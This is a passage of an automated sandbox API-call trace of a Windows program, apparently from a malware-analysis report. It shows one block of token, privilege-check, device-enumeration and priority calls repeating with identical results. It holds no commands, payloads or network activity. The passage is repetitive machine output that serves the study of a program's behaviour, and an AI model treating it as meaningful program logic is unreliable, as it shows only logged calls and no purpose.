(hProcess=0x0) returned 0x0 [0085.123] GetCurrentThread () returned 0xfffffffe [0085.123] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.123] GetLastError () returned 0x3f0 [0085.123] GetCurrentProcess () returned 0xffffffff [0085.123] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.123] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.123] SetLastError (dwErrCode=0x522) [0085.123] CloseHandle (hObject=0x114) returned 1 [0085.123] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.123] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.123] GetLastError () returned 0x578 [0085.123] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.123] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.123] GetCurrentThread () returned 0xfffffffe [0085.123] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.123] GetLastError () returned 0x3f0 [0085.123] GetCurrentProcess () returned 0xffffffff [0085.123] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.123] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.123] SetLastError (dwErrCode=0x522) [0085.123] CloseHandle (hObject=0x114) returned 1 [0085.123] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.123] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.123] GetLastError () returned 0x578 [0085.123] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.123] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.123] GetCurrentThread () returned 0xfffffffe [0085.123] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.123] GetLastError () returned 0x3f0 [0085.123] GetCurrentProcess () returned 0xffffffff [0085.123] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.123] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.124] SetLastError (dwErrCode=0x522) [0085.124] CloseHandle (hObject=0x114) returned 1 [0085.124] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.124] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.124] GetLastError () returned 0x578 [0085.124] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.124] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.124] GetCurrentThread () returned 0xfffffffe [0085.124] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.124] GetLastError () returned 0x3f0 [0085.124] GetCurrentProcess () returned 0xffffffff [0085.124] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.124] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.124] SetLastError (dwErrCode=0x522) [0085.124] CloseHandle (hObject=0x114) returned 1 [0085.124] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.124] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.124] GetLastError () returned 0x578 [0085.124] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.124] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.124] GetCurrentThread () returned 0xfffffffe [0085.124] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.124] GetLastError () returned 0x3f0 [0085.124] GetCurrentProcess () returned 0xffffffff [0085.124] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.124] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.124] SetLastError (dwErrCode=0x522) [0085.124] CloseHandle (hObject=0x114) returned 1 [0085.124] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.124] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.124] GetLastError () returned 0x578 [0085.124] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.124] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.124] GetCurrentThread () returned 0xfffffffe [0085.124] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.125] GetLastError () returned 0x3f0 [0085.125] GetCurrentProcess () returned 0xffffffff [0085.125] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.125] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.125] SetLastError (dwErrCode=0x522) [0085.125] CloseHandle (hObject=0x114) returned 1 [0085.125] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.125] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.125] GetLastError () returned 0x578 [0085.125] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.125] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.125] GetCurrentThread () returned 0xfffffffe [0085.125] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.125] GetLastError () returned 0x3f0 [0085.125] GetCurrentProcess () returned 0xffffffff [0085.125] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.125] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.125] SetLastError (dwErrCode=0x522) [0085.125] CloseHandle (hObject=0x114) returned 1 [0085.125] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.125] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.125] GetLastError () returned 0x578 [0085.125] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.125] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.125] GetCurrentThread () returned 0xfffffffe [0085.125] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.125] GetLastError () returned 0x3f0 [0085.125] GetCurrentProcess () returned 0xffffffff [0085.125] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.125] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.125] SetLastError (dwErrCode=0x522) [0085.125] CloseHandle (hObject=0x114) returned 1 [0085.125] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.125] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.125] GetLastError () returned 0x578 [0085.125] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.125] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.126] GetCurrentThread () returned 0xfffffffe [0085.126] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.126] GetLastError () returned 0x3f0 [0085.126] GetCurrentProcess () returned 0xffffffff [0085.126] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.126] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.126] SetLastError (dwErrCode=0x522) [0085.126] CloseHandle (hObject=0x114) returned 1 [0085.126] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.126] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.126] GetLastError () returned 0x578 [0085.126] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.126] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.126] GetCurrentThread () returned 0xfffffffe [0085.126] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.126] GetLastError () returned 0x3f0 [0085.126] GetCurrentProcess () returned 0xffffffff [0085.126] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.126] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.126] SetLastError (dwErrCode=0x522) [0085.126] CloseHandle (hObject=0x114) returned 1 [0085.126] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.126] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.126] GetLastError () returned 0x578 [0085.126] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.126] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.126] GetCurrentThread () returned 0xfffffffe [0085.126] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.126] GetLastError () returned 0x3f0 [0085.126] GetCurrentProcess () returned 0xffffffff [0085.126] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.126] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.126] SetLastError (dwErrCode=0x522) [0085.126] CloseHandle (hObject=0x114) returned 1 [0085.126] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.127] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.127] GetLastError () returned 0x578 [0085.127] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.127] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.127] GetCurrentThread () returned 0xfffffffe [0085.127] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.127] GetLastError () returned 0x3f0 [0085.127] GetCurrentProcess () returned 0xffffffff [0085.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.127] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.127] SetLastError (dwErrCode=0x522) [0085.127] CloseHandle (hObject=0x114) returned 1 [0085.127] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.127] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.127] GetLastError () returned 0x578 [0085.127] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.127] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.127] GetCurrentThread () returned 0xfffffffe [0085.127] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.127] GetLastError () returned 0x3f0 [0085.127] GetCurrentProcess () returned 0xffffffff [0085.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.127] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.127] SetLastError (dwErrCode=0x522) [0085.127] CloseHandle (hObject=0x114) returned 1 [0085.127] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.127] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.127] GetLastError () returned 0x578 [0085.127] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.127] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.127] GetCurrentThread () returned 0xfffffffe [0085.127] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.127] GetLastError () returned 0x3f0 [0085.127] GetCurrentProcess () returned 0xffffffff [0085.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.127] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.128] SetLastError (dwErrCode=0x522) [0085.128] CloseHandle (hObject=0x114) returned 1 [0085.128] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.128] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.128] GetLastError () returned 0x578 [0085.128] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.128] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.128] GetCurrentThread () returned 0xfffffffe [0085.128] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.128] GetLastError () returned 0x3f0 [0085.128] GetCurrentProcess () returned 0xffffffff [0085.128] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.128] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.128] SetLastError (dwErrCode=0x522) [0085.128] CloseHandle (hObject=0x114) returned 1 [0085.128] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.128] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.128] GetLastError () returned 0x578 [0085.128] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.128] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.128] GetCurrentThread () returned 0xfffffffe [0085.128] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.128] GetLastError () returned 0x3f0 [0085.128] GetCurrentProcess () returned 0xffffffff [0085.128] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.128] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.128] SetLastError (dwErrCode=0x522) [0085.128] CloseHandle (hObject=0x114) returned 1 [0085.128] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.128] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.128] GetLastError () returned 0x578 [0085.128] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.128] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.128] GetCurrentThread () returned 0xfffffffe [0085.128] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.129] GetLastError () returned 0x3f0 [0085.129] GetCurrentProcess () returned 0xffffffff [0085.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.129] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.129] SetLastError (dwErrCode=0x522) [0085.129] CloseHandle (hObject=0x114) returned 1 [0085.129] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.129] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.129] GetLastError () returned 0x578 [0085.129] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.129] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.129] GetCurrentThread () returned 0xfffffffe [0085.129] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.129] GetLastError () returned 0x3f0 [0085.129] GetCurrentProcess () returned 0xffffffff [0085.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.129] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.129] SetLastError (dwErrCode=0x522) [0085.129] CloseHandle (hObject=0x114) returned 1 [0085.129] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.129] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.129] GetLastError () returned 0x578 [0085.129] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.129] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.129] GetCurrentThread () returned 0xfffffffe [0085.129] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.129] GetLastError () returned 0x3f0 [0085.129] GetCurrentProcess () returned 0xffffffff [0085.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.129] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.130] SetLastError (dwErrCode=0x522) [0085.130] CloseHandle (hObject=0x114) returned 1 [0085.130] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.130] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.130] GetLastError () returned 0x578 [0085.130] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.130] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.130] GetCurrentThread () returned 0xfffffffe [0085.130] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.130] GetLastError () returned 0x3f0 [0085.130] GetCurrentProcess () returned 0xffffffff [0085.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.130] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.130] SetLastError (dwErrCode=0x522) [0085.130] CloseHandle (hObject=0x114) returned 1 [0085.130] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.130] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.130] GetLastError () returned 0x578 [0085.130] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.130] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.130] GetCurrentThread () returned 0xfffffffe [0085.130] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.130] GetLastError () returned 0x3f0 [0085.130] GetCurrentProcess () returned 0xffffffff [0085.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.130] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.130] SetLastError (dwErrCode=0x522) [0085.130] CloseHandle (hObject=0x114) returned 1 [0085.130] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.130] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.130] GetLastError () returned 0x578 [0085.130] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.130] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.130] GetCurrentThread () returned 0xfffffffe [0085.130] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.130] GetLastError () returned 0x3f0 [0085.130] GetCurrentProcess () returned 0xffffffff [0085.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.130] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.130] SetLastError (dwErrCode=0x522) [0085.130] CloseHandle (hObject=0x114) returned 1 [0085.130] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.130] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.130] GetLastError () returned 0x578 [0085.130] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: 